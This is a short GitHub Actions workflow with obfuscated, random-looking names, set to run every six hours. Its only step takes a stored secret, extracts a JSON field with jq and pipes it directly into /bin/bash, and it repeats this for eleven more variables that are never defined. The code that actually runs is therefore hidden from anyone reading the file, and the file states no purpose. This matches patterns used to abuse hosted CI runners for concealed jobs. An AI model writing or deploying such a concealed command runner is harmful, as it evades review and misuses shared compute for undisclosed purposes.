name: kedaoma7564

on:
  workflow_dispatch:
  schedule:
    - cron: '10 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kedaoma7564
        env:
          zzov16: ${{ secrets.zzov16 }}
        run: |
          echo $zzov16 | jq -r .gos42295 | /bin/bash
          echo $jnuk15 | jq -r .qoe8 | /bin/bash
          echo $i67441 | jq -r .ykd84 | /bin/bash
          echo $sawzw6 | jq -r .ayyo564 | /bin/bash
          echo $yce1667 | jq -r .u0 | /bin/bash
          echo $ekjco12 | jq -r .pkjj5 | /bin/bash
          echo $rgyd18 | jq -r .xh8 | /bin/bash
          echo $x04024 | jq -r .ogwk28 | /bin/bash
          echo $rkyck3 | jq -r .euatg5 | /bin/bash
          echo $gcfcr335 | jq -r .ffj9975 | /bin/bash
          echo $ut66270 | jq -r .yir46104 | /bin/bash
          echo $eq4368 | jq -r .lita25196 | /bin/bash

